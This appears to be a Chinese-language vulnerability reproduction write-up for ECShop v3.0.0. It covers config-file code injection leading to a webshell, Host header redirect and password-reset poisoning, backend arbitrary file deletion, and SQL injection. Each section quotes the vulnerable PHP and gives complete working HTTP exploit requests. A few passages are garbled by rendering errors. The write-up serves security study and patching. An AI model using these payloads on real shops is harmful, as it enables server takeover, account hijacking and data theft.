ECShop-v3.0.0漏洞复现
ECShop-v3.0.0漏洞复现
- 配置文件写入导致代码执行
- HTTP Host头部攻击导致任意页面跳转
- HTTP Host头部攻击导致前台任意密码重置
- 后台任意文件删除
- 后台SQL注入
配置文件写入导致代码执行
在\ECShop -v3.0.0\install\index.php文件中,使用POST请求接收配置信息的值,并且直接传入到create_config_file方法。
case 'create_config_file' :$db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';$db_port = isset($_POST['db_port']) ? trim($_POST['db_port']) : '';$db_user = isset($_POST['db_user']) ? trim($_POST['db_user']) : '';$db_pass = isset($_POST['db_pass']) ? trim($_POST['db_pass']) : '';$db_name = isset($_POST['db_name']) ? trim($_POST['db_name']) : '';$prefix = isset($_POST['db_prefix']) ? trim($_POST['db_prefix']) : '';$timezone = isset($_POST['timezone']) ? trim($_POST['timezone']) : 'Asia/Shanghai';$result = create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix, $timezone);if ($result === false)
跟踪create_config_file()方法,在\ECShop-3.0.0\install\includes\lib_installer.php文件中发现该该方法,其中关键代码如下,将传入的配置信息,直接写在配置文件中,整个过程未对POST传入的数据进行安全处理,因此存在配置文件写入导致代码执行的问题。
function create_config_file($db_host, $db_port, $db_user, $db_pass, $db_name, $prefix, $timezone)
{global $err, $_LANG;$db_host = construct_db_host($db_host, $db_port);$content = '<?' ."php\n";$content .= "// database host\n";$content .= "\$db_host = \"$db_host\";\n\n";$content .= "// database name\n";$content .= "\$db_name = \"$db_name\";\n\n";$content .= "// database username\n";$content .= "\$db_user = \"$db_user\";\n\n";$content .= "// database password\n";$content .= "\$db_pass = \"$db_pass\";\n\n";$content .= "// table prefix\n";$content .= "\$prefix = \"$prefix\";\n\n";$content .= "\$timezone = \"$timezone\";\n\n";$content .= "\$cookie_path = \"/\";\n\n";$content .= "\$cookie_domain = \"\";\n\n";$content .= "\$session = \"1440\";\n\n";$content .= "define('EC_CHARSET','".EC_CHARSET."');\n\n";$content .= "define('ADMIN_PATH','admin');\n\n";$content .= "define('AUTH_KEY', 'this is a key');\n\n";$content .= "define('OLD_AUTH_KEY', '');\n\n";$content .= "define('API_TIME', '');\n\n";$content .= "define('STORE_KEY','".md5(microtime())."');\n\n";$content .= '?>';$fp = @fopen(ROOT_PATH . 'data/config.php', 'wb+');if (!$fp){$err->add($_LANG['open_config_file_failed']);return false;}if (!@fwrite($fp, trim($content))){$err->add($_LANG['write_config_file_failed']);return false;}@fclose($fp);return true;
}
复现:
在进行安装操作的时候可以在如下请求包中的db_host,db_port,db_user,db_pass,db_name,db_prefix,timezone位置上写入PHP代码。如下以db_name和timezone为例。
进行如下请求,会在配置文件中写入PHP代码。
POST /install/index.php?step=create_config_file HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=
Content-Length: 324
Cookie: ECS[visit_times]=3; ECS[history]=72; PHPSESSID=uao2tc7rcn7c7lni4afpdmo2e5
Connection: close
db_host=localhost&db_port=3306&db_user=root&db_pass=root&db_name=ecshop30%22.die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&db_prefix=ecs_&timezone=PRC".die(fwrite(fopen(%22evil.php%22%2C%20%22w%22)%2C%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22)).%22&lang=zh_cn&IS_AJAX_REQUEST=yes
请求成功后查看配置文件。
发现配置文件中的db_name和timezone位置写入了PHP代码。
访问http://127.0.0.1/data/config.php配置文件所在的位置,便会生成evil.php的恶意文件。
访问http://127.0.0.1/data/evil.php可以执行相应的PHP代码导致GetShell。
HTTP Host头部攻击导致任意页面跳转
在\ECShop-3.0.0\install\index.php文件中将拼接后的url传入到header函数中然后进行跳转。
case 'done' :$result = deal_aftermath();clear_all_files();if($_SERVER['HTTP_HOST']!='localhost' && $_REQUEST['type']=='yunqi'){$url = url()."/yunqi_check.php?act=yunqi_check";header("Location: ".$url);exit;}else{if ($result === false){$err_msg = implode(',', $err->get_all());$smarty->assign('err_msg', $err_msg);$smarty->display('error.php');}
跟入url方法,在\ECShop-3.0.0\install\includes\lib_installer.php文件中发现该方法,使用$_SERVER[‘HTTP_HOST’]方式获取主机名然后进行拼接后返回到方法被调用的位置,因此存在http host 部攻击导致任意跳转的问题。
function url()
{$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];$ecserver = 'http://'.$_SERVER['HTTP_HOST'].($_SERVER['SERVER_PORT'] && $_SERVER['SERVER_PORT'] != 80 ? ':'.$_SERVER['SERVER_PORT'] : '');$default_appurl = $ecserver.substr($PHP_SELF, 0, strpos($PHP_SELF, 'install/') - 1);return $default_appurl;}
复现:
进行如下请求,返回302跳转到www.evil.com站点。
GET /install/index.php?lang=zh_cn&step=done&type=yunqi HTTP/1.1
Host: www.evil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/install/index.php?lang=zh_cn&step=setting_ui&ui=
Connection: close
Upgrade-Insecure-Requests: 1
HTTP Host头部攻击导致前台任意密码重置
在\ECShop3.0.0\user.php文件中,当使用邮箱进行密码重置的时候,会调用send_pwd_email的方法。
/* 发送密码修改确认邮件 */
elseif ($action == 'send_pwd_email')
{include_once(ROOT_PATH . 'includes/lib_passport.php');/* 初始化会员用户名和邮件地址 */$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$email = !empty($_POST['email']) ? trim($_POST['email']) : '';//用户名和邮件地址是否匹配$user_info = $user->get_user_info($user_name);if ($user_info && $user_info['email'] == $email){//生成code//$code = md5($user_info[0] . $user_info[1]);$code = md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']);//发送邮件的函数if (send_pwd_email($user_info['user_id'], $user_name, $email, $code)){show_message($_LANG['send_success'] . $email, $_LANG['back_home_lnk'], './', 'info');}else{//发送邮件出错show_message($_LANG['fail_send_password'], $_LANG['back_page_up'], './', 'info');}}else{//用户名与邮件地址不匹配show_message($_LANG['username_no_email'], $_LANG['back_page_up'], '', 'info');}
}
跟入send_pwd_email方法,在\ECShop-3.0.0\includes\lib_passport.php文件中使用了url方法,然后将邮件中的正文内容进行拼接,拼接后的结果为content,再将content,再将content,再将content传入send_mail方法。
/* 设置重置邮件模板所需要的内容信息 */$template = get_mail_template('send_password');$reset_email = $GLOBALS['ecs']->url() . 'user.php?act=get_password&uid=' . $uid . '&code=' . $code;$GLOBALS['smarty']->assign('user_name', $user_name);$GLOBALS['smarty']->assign('reset_email', $reset_email);$GLOBALS['smarty']->assign('shop_name', $GLOBALS['_CFG']['shop_name']);$GLOBALS['smarty']->assign('send_date', date('Y-m-d'));$GLOBALS['smarty']->assign('sent_date', date('Y-m-d'));$content = $GLOBALS['smarty']->fetch('str:' . $template['template_content']);/* 发送确认重置密码的确认邮件 */if (send_mail($user_name, $email, $template['template_subject'], $content, $template['is_html'])){return true;}else{return false;}
}
跟入url方法,在\ECShop3.0.0\includes\cls_ecshop.php文件中发现该方法,该方法return的时候调用了get_domain方法。
function url(){$curr = strpos(PHP_SELF, ADMIN_PATH . '/') !== false ?preg_replace('/(.*)(' . ADMIN_PATH . ')(\/?)(.)*/i', '\1', dirname(PHP_SELF)) :dirname(PHP_SELF);$root = str_replace('\\', '/', $curr);if (substr($root, -1) != '/'){$root .= '/';}return $this->get_domain() . $root;}
跟入get_domain方法,在\ECShop3.0.0\includes\cls_ecshop.php文件的中发现该方法,在该文件中,使用了KaTeX parse error: Double subscript at position 16: _SERVER['HTTP_X_̲FORWARDED_HOST'…_SERVER[‘HTTP_HOST’]来获取主机域名和IP地址,属于用户可以控制的输入点。因此整个发送邮件过程中,正文部分可以通过修改HTTP 请求的host进行伪造。
function get_domain(){/* 协议 */$protocol = $this->http();/* 域名或IP地址 */if (isset($_SERVER['HTTP_X_FORWARDED_HOST'])){$host = $_SERVER['HTTP_X_FORWARDED_HOST'];}elseif (isset($_SERVER['HTTP_HOST'])){$host = $_SERVER['HTTP_HOST'];}else{/* 端口 */if (isset($_SERVER['SERVER_PORT'])){$port = ':' . $_SERVER['SERVER_PORT'];if ((':80' == $port && 'http://' == $protocol) || (':443' == $port && 'https://' == $protocol)){$port = '';}}else{$port = '';}if (isset($_SERVER['SERVER_NAME'])){$host = $_SERVER['SERVER_NAME'] . $port;}elseif (isset($_SERVER['SERVER_ADDR'])){$host = $_SERVER['SERVER_ADDR'] . $port;}}return $protocol . $host;}
复现:
在得知用户名和注册邮箱的情况下,可以使用如下的请求发送密码重置链接。
POST /user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
Referer: http://127.0.0.1/user.php?act=get_password
Cookie: ECS[visit_times]=2; ECS_ID=500ac5868ca2faceb1b34797cd8f7bebf6ed1009
client-ip: 127.0.0.2
X-Forwarded-For: 127.0.0.3
Connection: close
Upgrade-Insecure-Requests: 1
user_name=Thinking&email=thinking_balabala%40163.com&act=send_pwd_email&submit=%E6%8F%90+%E4%BA%A4
受害者就会收到一封如下信息的邮件,点击邮件中的重置密码链接就会将重置密码的key发送到攻击者的服务器上。
攻击者收到重置密码的code,便可以进行密码重置。
后台任意文件删除
在\ECShop3.0.0\admin\article.php文件中的代码块,其中使用POST接收file_url参数的值,然后将内容插入到数据库中的article表。
/* 计算文章打开方式 */if ($file_url == ''){$open_type = 0;}else{$open_type = $_POST['FCKeditor1'] == '' ? 1 : 2;}/*插入数据*/$add_time = gmtime();if (empty($_POST['cat_id'])){$_POST['cat_id'] = 0;}$sql = "INSERT INTO ".$ecs->table('article')."(title, cat_id, article_type, is_open, author, "."author_email, keywords, content, add_time, file_url, open_type, link, description) "."VALUES ('$_POST[title]', '$_POST[article_cat]', '$_POST[article_type]', '$_POST[is_open]', "."'$_POST[author]', '$_POST[author_email]', '$_POST[keywords]', '$_POST[FCKeditor1]', "."'$add_time', '$file_url', '$open_type', '$_POST[link_url]', '$_POST[description]')";$db->query($sql);
然后在该文件的如下代码中,从数据库的article表将file_url,取出来进行然后使用unlink进行删除操作,整个过程未对文件名称进行安全处理,导致存在任意文件删除漏洞。
elseif ($_REQUEST['act'] == 'remove')
{check_authz_json('article_manage');$id = intval($_GET['id']);/* 删除原来的文件 */$sql = "SELECT file_url FROM " . $ecs->table('article') . " WHERE article_id = '$id'";$old_url = $db->getOne($sql);if ($old_url != '' && strpos($old_url, 'http://') === false && strpos($old_url, 'https://') === false){@unlink(ROOT_PATH . $old_url);}
复现:
先将要删除的文件路径添加到file_url参数的位置,然后进行如下请求,往数据库的article表中插入一条带有要删除的目标文件路径的数据。
POST /admin/article.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1873
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryab9PkzCWZGRw6awU
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: http://127.0.0.1/admin/article.php?act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: loginNum=3; ECS_LastCheckOrder=Tue%2C%2023%20Jan%202018%2002%3A55%3A15%20GMT; Toggle_State_1={},Wed, 24 Jan 2018 06:42:48 GMT; ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A9%253A%257Bs%253A7%253A%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522cat_id%2522%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2522%253Bs%253A12%253A%2522a.article_id%2522%253Bs%253A10%253A%2522sort_order%2522%253Bs%253A4%253A%2522DESC%2522%253Bs%253A12%253A%2522record_count%2522%253Bs%253A2%253A%252235%2522%253Bs%253A9%253A%2522page_size%2522%253Bi%253A15%253Bs%253A4%253A%2522page%2522%253Bi%253A1%253Bs%253A10%253A%2522page_count%2522%253Bd%253A3%253Bs%253A5%253A%2522start%2522%253Bi%253A0%253B%257D; ECSCP[lastfiltersql]=U0VMRUNUIGEuKiAsIGFjLmNhdF9uYW1lIEZST00gYGVjc2hvcDMwYC5gZWNzX2FydGljbGVgIEFTIGEgTEVGVCBKT0lOIGBlY3Nob3AzMGAuYGVjc19hcnRpY2xlX2NhdGAgQVMgYWMgT04gYWMuY2F0X2lkID0gYS5jYXRfaWQgV0hFUkUgMSAgT1JERVIgYnkgYS5hcnRpY2xlX2lkIERFU0M%3D; security_level=1; __guid=96992031.2794073907059157500.1501489482338.276; sYQDUGqqzHsearch_history=a%7C1; a9617_times=1; bdshare_firstime=1510970163771; ECS_ID=54f1ee86ca058e2980cef4a2a937ba2697eb82ea; ECS[visit_times]=1; ECSCP_ID=0c82abaa20ce2ecacb164e5218eaccbc3e3ce52f; monitor_count=9
Connection: close
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“title”
balabala1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“article_cat”
2
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“article_type”
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“is_open”
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“author”
thinking
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“author_email”
thinking@qq.com
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“keywords”
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“description”
1
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“link_url”
http://host.2tzion.ceye.io
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“file”; filename=""
Content-Type: image/png
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“file_url”
data/install.lock
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“FCKeditor1”
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“cat_id”
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“brand_id”
0
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“keyword”
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“act”
insert
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“old_title”
------WebKitFormBoundaryab9PkzCWZGRw6awU
Content-Disposition: form-data; name=“id”
------WebKitFormBoundaryab9PkzCWZGRw6awU–
然后进行如下请求,删除对应的id号的内容,删除的同时就会将上一步请求的文件进行unlink操作。
GET /admin/article.php?is_ajax=1&act=remove&id=39&keyword=&cat_id=0&sort_by=a.article_id&sort_order=DESC&record_count=36&page_size=15&page=1&page_count=3&start=0&1516676396253253 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: /
Referer: http://127.0.0.1/admin/article.php?act=list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: loginNum=3; Toggle_State_1={},Wed, 24 Jan 2018 06:42:48 GMT; ECS_LastCheckOrder=Tue%2C%2023%20Jan%202018%2002%3A58%3A47%20GMT; ECSCP[lastfilterfile]=23A0E66; ECSCP[lastfilter]=a%253A9%253A%257Bs%253A7%253A%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522cat_id%2522%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2522%253Bs%253A12%253A%2522a.article_id%2522%253Bs%253A10%253A%2522sort_order%2522%253Bs%253A4%253A%2522DESC%2522%253Bs%253A12%253A%2522record_count%2522%253Bs%253A2%253A%252236%2522%253Bs%253A9%253A%2522page_size%2522%253Bi%253A15%253Bs%253A4%253A%2522page%2522%253Bi%253A1%253Bs%253A10%253A%2522page_count%2522%253Bd%253A3%253Bs%253A5%253A%2522start%2522%253Bi%253A0%253B%257D; ECSCP[lastfiltersql]=U0VMRUNUIGEuKiAsIGFjLmNhdF9uYW1lIEZST00gYGVjc2hvcDMwYC5gZWNzX2FydGljbGVgIEFTIGEgTEVGVCBKT0lOIGBlY3Nob3AzMGAuYGVjc19hcnRpY2xlX2NhdGAgQVMgYWMgT04gYWMuY2F0X2lkID0gYS5jYXRfaWQgV0hFUkUgMSAgT1JERVIgYnkgYS5hcnRpY2xlX2lkIERFU0M%3D; security_level=1; __guid=96992031.2794073907059157500.1501489482338.276; sYQDUGqqzHsearch_history=a%7C1; a9617_times=1; bdshare_firstime=1510970163771; ECS_ID=54f1ee86ca058e2980cef4a2a937ba2697eb82ea; ECS[visit_times]=1; ECSCP_ID=0c82abaa20ce2ecacb164e5218eaccbc3e3ce52f; monitor_count=10
Connection: close
后台SQL注入
在/admin/shophelp.php文件中中的$_POST[‘id’]在没有经过安全处理和过滤的情况下直接传递拼接到SQL语句中,导致SQL注入漏洞。
if ($_REQUEST['act'] == 'update'){/* 权限判断 */admin_priv('shophelp_manage');/* 检查重名 */if ($_POST['title'] != $_POST['old_title'] ){$exc_article->is_only('title', $_POST['title'], $_LANG['articlename_exist'], $_POST['id']);}/* 更新 */if ($exc_article->edit("title = '$_POST[title]', cat_id = '$_POST[cat_id]', article_type = '$_POST[article_type]', content = '$_POST[FCKeditor1]'", $_POST['id'])){/* 清除缓存 */clear_cache_files();$link[0]['text'] = $_LANG['back_list'];$link[0]['href'] = 'shophelp.php?act=list_article&cat_id='.$_POST['cat_id'];sys_msg(sprintf($_LANG['articleedit_succeed'], $_POST['title']), 0, $link);admin_log($_POST['title'], 'edit', 'shophelp');}}
在检测重命名的代码块里面的$_POST[‘id’]存在数字型注入,可以利用该漏洞获取数据库中敏感信息。
$exc_article->is_only('title', $_POST['title'], $_LANG['articlename_exist'], $_POST['id']);
复现:
可以用报错注入得到数据库数据,如使用下面的payload可以获取数据库中的信息
POST /code/ECShop30/admin/shophelp.php?act=update HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Cookie: ECSCP_ID=328cb50e35929abc119899c12b9a46495ca49fcf
Connection: close
Upgrade-Insecure-Requests: 1
title=aaa&old_title=bbb&cat_id=2&article_type=1&FCKeditor1=ccc&id=updatexml(0,(concat(0x7e,(select user()),0x7e)),0)
ECShop-v3.0.0漏洞复现相关推荐
- metinfov5.0.4漏洞复现
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...
- Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
0x01 前言 PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel.LibreOffic Calc等表格格式的文件,是PHPExcel的替代者.2018年11月 ...
- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...
- 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...
- Thinkphp历史漏洞复现
Thinkphp简介 Thinkphp 是一种开源框架.是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架. 很多cms(内容管理系统)就是基于 thin ...
- vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...
文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...
- ewebeditor文件上传漏洞2.8.0版本(漏洞复现)
漏洞概述 ewebeditor 是常用的网站后台编辑器,此编辑器有asp等版本. 登陆后台之后,可以通过修改上传文件白名单的方法,任意文件上传. 漏洞危害等级 高危 影响版本 v2.8.0 漏洞复现 ...
- ThinkPHP 5.0.23 远程代码执行 漏洞复现
ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...
- thinkphp 5.0.23 rce漏洞复现
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...
最新文章
- WordPress 网站开发“微信小程序“实战(二)
- python解决组合问题
- 网络推广外包——竞价账户网络推广外包时怎样进行关键词推广?
- opencv python 多帧降噪算法_OpenCV-Python中用于视频跟踪的Meanshift和Camshift算法介绍...
- 单片机控制小风扇马达c语言,模拟风扇控制电路(单片机C程序设计)
- [转载] Java8 Stream流遍历 如何使用索引
- jsp数据传入html页面_曾经风光无限的 JSP,为什么现在很少有人使用了?
- PHP常量详解:define和const的区别
- JavaScriptSerializer 类
- JVM性能调优监控工具
- 商品信息SKU数据库设计
- 《IDSSIM:基于改进的疾病语义相似度方法的lncRNA功能相似度计算模型》论文梳理
- 【日记本砸】21.04.16-31 他们身旁也有窗,却没有人向外眺望。
- 亚马逊云科技为全球的可持续发展进程做出贡献
- 结构体与动态内存(5.11)
- 有源信号 无源信号 模拟量 开关量 解释
- Verilog/@符号什么意思
- JVM-浅堆和深堆的区别?
- 淘宝天猫京东拼多多抖音苏宁1688等平台关键词监控价格API接口(店铺商品价格监控API接口调用展示)
- Python一些技巧
热门文章
- adobe 后缀勒索病毒解密成功
- mycat 分库分表
- Redis应用问题解决(缓存穿透、击穿、雪崩、分布式锁)
- 军用软件概算计价规范_军用软件概算计价规范_关于举办军用软件功能点分析及计价规范讲解与交流会的通知......
- 联合办公格局已定?氪空间优客工场双雄争霸
- android数据库的创建
- 山东大学软件工程应用与实践——GMSSL开源库(九)——SM9密钥封装与公钥加密的源代码分析
- ubuntu18 全志H6开发板 开机启动,联网问题
- 全志 H6 Orange Pi Lite 2 Android 7.0 UART配置
- deny和revoke的区别